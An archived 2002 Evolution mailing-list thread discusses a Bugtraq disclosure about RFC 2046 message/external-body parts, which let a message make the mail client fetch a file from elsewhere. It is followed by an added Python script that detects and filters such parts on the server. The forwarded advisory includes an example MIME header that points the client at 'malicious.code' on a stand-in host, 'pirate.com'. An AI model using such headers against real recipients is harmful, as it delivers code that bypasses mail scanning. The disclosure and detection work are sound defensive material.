Speaking strictly client-side, what difference would this make over
someone sending you malicious.code in the actual body of the message?

As far as I can tell, there's no difference.

That said, I can't tell you if we will or will not implement this
feature. Personally I'd like to do it eventually because I think it's
kinda cool.

Just because virus scanning software on the server is stupid doesn't
mean you should limit functionality in the client; it just means you
have to make server software less stupid. Either that or educate users.

Besides, Evolution is a Unix client - I don't know of any virus that
Evolution will auto-execute and will allow to root your system and do
all sorts of nasty stuff.

Evolution will never run a script or binary attachment. Ever. And afaik,
we don't plan on making it so that messages can contain embedded scripts
that Evolution will auto-magically run like Outlook does, so that's not
an issue either. (We do plan to add scripting support to Evolution at
some point, but we do not plan to make it so that messages can invoke
commands).

Jeff

On Fri, 2002-09-27 at 11:48, Richard Bellavance wrote:
> I hope support for this aberration will not be integrated into
> Evolution...
> 
> At least, 1.0.8 does not seem to support it.
> 
> -- 
> Richard Bellavance                   COGNICASE inc.
> Analyste-programmeur principal       Hébergement, sécurité et réseaux
> T.: 514-732-8000 #4153               20, Place du Commerce
> F.: 514-732-8021                     Verdun, Qc, H3E 1Z6, CANADA
> 
> ______________________________________________________________________
> 
> From: Jose Marcio Martins da Cruz <[EMAIL PROTECTED]>
> To: bugtraq <[EMAIL PROTECTED]>
> Subject: Another possible RFC 2046 vulnerability.
> Date: 27 Sep 2002 13:01:46 +0200
> 
> 
> Hi,
> 
> Some days ago, we were talking about the RFC 2046 message fragmentation
> vulnerability.
> 
> There is another related RFC 2046 vulnerability: the message/external-body
> message type.
> 
> The RFC 2046 message/external-body MIME type allows messages to be sent not
> by their content, but by reference.
> 
> In this case, you can send a message with the following MIME tag:
> 
>    Content-Type: message/external-body; name="malicious.code";
>                  site="pirate.com"; mode="image";
>                  access-type=ANON-FTP; directory="pub"
> 
> The client MUA receives this and will get the "malicious.code" file by
> anonymous ftp from the pirate.com ftp server.
> 
> RFC 2046 defines five access-types: "FTP", "ANON-FTP", "TFTP",
> "LOCAL-FILE", and "MAIL-SERVER".
> 
> There are some other optional parameters to this feature.  For example,
> if the message includes the parameter permission="write", an existing file
> will be overwritten.
> 
> RFC 2046 says something about security in paragraph 5.2.3.6:
> 
> >    (1)   Accessing data via a "message/external-body" reference
> >          effectively results in the message recipient performing
> >          an operation that was specified by the message
> >          originator.  It is therefore possible for the message
> >          originator to trick a recipient into doing something
> >          they would not have done otherwise.  ...
> 
> Combining different access-types (mainly anon-ftp, mail-server and
> local-file) can create, IMHO, more complex attacks.
> 
> What's interesting is that in this case the message and the malicious
> code pass through two different network paths: the message is sent by
> mail and the malicious code will be fetched by the receiver by anonymous ftp.
> 
> In the case of the previous vulnerability (fragmented message), the message
> and the malicious code use the same network path.
> 
> Classical mail server virus scanners will never see the malicious code
> pass through them, as they will never have the entire malicious code
> available.
> 
> The only way to detect it, IMHO, at the mail server, is by lexical analysis
> of MIME tags.
> 
> Netscape Communicator 4.79 is compatible with this RFC 2046 feature.
> 
> I can't say anything about other mail clients, as I'm sick at home and
> I have no access to other MUAs.
> 
> Attached to this message you'll find a message sent using this feature
> and allowing you to get RFC 2046 by anonymous ftp. Maybe someone can
> check it out with Outlook and other popular MUAs. It's in the /var/mail
> format: you can append it to your mailbox and try it... 8-)
> 
> References : RFC 2046 - MIME - Media Types
> 
> Jose Marcio
> 
> 
> -- 
>  -------------------------------------------------------------------
>  Jose Marcio MARTINS DA CRUZ     
>  Ecole Nationale Superieure des Mines de Paris    
>  Centre de Calcul                             Tel . : 01.40.51.93.41
>  60, bd Saint Michel                    http://www.ensmp.fr/~martins
>  75272 - PARIS CEDEX 06                   mailto:[EMAIL PROTECTED]
> 
> ______________________________________________________________________
> 
> From [EMAIL PROTECTED]  Wed Sep 18 10:40:02 2002
> Return-Path: <[EMAIL PROTECTED]>
> Received: from didi.ensmp.fr (didi [10.5.5.101])
>       by ticrobe.ensmp.fr (8.12.4/8.12.2/JMMC) with ESMTP id g8I8dLCi003339
>       for <[EMAIL PROTECTED]>; Wed, 18 Sep 2002 10:40:02 +0200
> Sender: [EMAIL PROTECTED]
> Message-ID: <[EMAIL PROTECTED]>
> Date: Wed, 18 Sep 2002 10:29:14 +0200
> From: Jose Martins <[EMAIL PROTECTED]>
> Reply-To: [EMAIL PROTECTED]
> X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686)
> X-Accept-Language: en
> MIME-Version: 1.0
> To: [EMAIL PROTECTED]
> Subject: tst attachment
> Content-Type: multipart/mixed;
>  boundary="------------FA43411C8E35AC7F655DA077"
> X-Miltered: at ticrobe by Joe's j-chkmail ("http://j-chkmail.ensmp.fr";)!
> Status: RO
> 
> This is a multi-part message in MIME format.
> --------------FA43411C8E35AC7F655DA077
> Content-Type: text/plain; charset=us-ascii
> Content-Transfer-Encoding: 7bit
> 
> 
> RFC 2046 message/external-body compatibility test
> 
> 
> --------------FA43411C8E35AC7F655DA077
> Content-Type: message/external-body; name="rfc2046.Z";
>         site="ftp.inria.fr"; mode="image";
>         access-type=ANON-FTP; directory="rfc/rfc20xx"
> 
> 
> --------------FA43411C8E35AC7F655DA077--
-- 
Jeffrey Stedfast
Evolution Hacker - Ximian, Inc.
[EMAIL PROTECTED]  - www.ximian.com


_______________________________________________
evolution maillist  -  [EMAIL PROTECTED]
http://lists.ximian.com/mailman/listinfo/evolution
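Jose Marcio's point is that a server-side virus scanner never sees a body fetched by reference, and that the only handle the mail server has is lexical analysis of the MIME tags. The following is an added example of such a check, written for this page; it is not code from Evolution, from j-chkmail or from anyone in the thread. It uses Python's standard-library `email` package to walk the MIME parts of a message, reports every `message/external-body` part with its `access-type`, `site`, `name`, `directory` and `permission` parameters, and maps the findings to a filter decision. The sample message is constructed here, modelled on the test message quoted above but with `example.com` placeholder addresses and host; the `policy_action` thresholds (reject write permission and local-file references, flag everything else) are one possible policy, not anything the thread prescribes.

```python
"""Server-side lexical check for RFC 2046 message/external-body MIME parts.

Added example, not code from Evolution, j-chkmail or anyone in the thread.
A body fetched by reference never passes through the mail server, so the only
server-side handle is the Content-Type header: walk the MIME parts and report
each message/external-body part with the parameters that matter for risk.
"""
import email
from email.utils import collapse_rfc2231_value

# The five access types RFC 2046 defines for message/external-body.
RFC2046_ACCESS_TYPES = {"FTP", "ANON-FTP", "TFTP", "LOCAL-FILE", "MAIL-SERVER"}
BOUNDARY = "------------FA43411C8E35AC7F655DA077"


def build_sample(external_body_params):
    """Constructed test message (placeholder addresses), modelled on the one
    quoted in the thread: a text part followed by a message/external-body part."""
    return f"""\
From: sender@example.com
To: recipient@example.com
Subject: tst attachment
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="{BOUNDARY}"

This is a multi-part message in MIME format.
--{BOUNDARY}
Content-Type: text/plain; charset=us-ascii

RFC 2046 message/external-body compatibility test

--{BOUNDARY}
Content-Type: message/external-body; {external_body_params}


--{BOUNDARY}--
"""


# Constructed ANON-FTP sample; ftp.example.com is a placeholder, not a real host.
SAMPLE_ANON_FTP = build_sample(
    'name="rfc2046.Z"; site="ftp.example.com"; mode="image"; '
    'access-type=ANON-FTP; directory="rfc/rfc20xx"'
)


def _param(part, name):
    """Read one Content-Type parameter, unquoted and RFC 2231-collapsed."""
    value = part.get_param(name)
    return None if value is None else collapse_rfc2231_value(value)


def _reasons(finding):
    """Explain why the part deserves attention."""
    reasons = ["body is fetched by reference, so a body scanner never sees it"]
    if finding["access_type"] == "LOCAL-FILE":
        reasons.append("references a file on the recipient's own system")
    if finding["write"]:
        reasons.append('permission="write" lets an existing file be overwritten')
    if not finding["known_access_type"]:
        reasons.append("access-type is not one of the five RFC 2046 defines")
    return reasons


def scan_external_body(raw_message):
    """Return one finding dict per message/external-body part in the message."""
    findings = []
    for part in email.message_from_string(raw_message).walk():
        if part.get_content_type() != "message/external-body":
            continue
        access_type = (_param(part, "access-type") or "").upper()
        permission = (_param(part, "permission") or "read").lower()
        finding = {
            "access_type": access_type,
            "known_access_type": access_type in RFC2046_ACCESS_TYPES,
            "site": _param(part, "site"),
            "name": _param(part, "name"),
            "directory": _param(part, "directory"),
            "write": permission == "write",
        }
        finding["reasons"] = _reasons(finding)
        findings.append(finding)
    return findings


def policy_action(findings):
    """Filter decision: 'accept', 'flag' (tag or quarantine for review) or
    'reject'.  Rejecting every external-body part is the simplest policy;
    this one rejects only write permission and local-file references."""
    if not findings:
        return "accept"
    if any(f["write"] or f["access_type"] == "LOCAL-FILE" for f in findings):
        return "reject"
    return "flag"


if __name__ == "__main__":
    for f in scan_external_body(SAMPLE_ANON_FTP):
        print(f["access_type"], f["site"], f["name"], f["directory"], f["reasons"])
```

Run stand-alone it prints the single ANON-FTP finding from the constructed sample. Because the check reads only the `Content-Type` header of each part, it works at the MTA or milter stage before any body is delivered, which is exactly where a body-based scanner has nothing to look at; the parameter values it extracts are what a filter would log so that a later investigation can see which host and file a recipient's client was being told to fetch.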
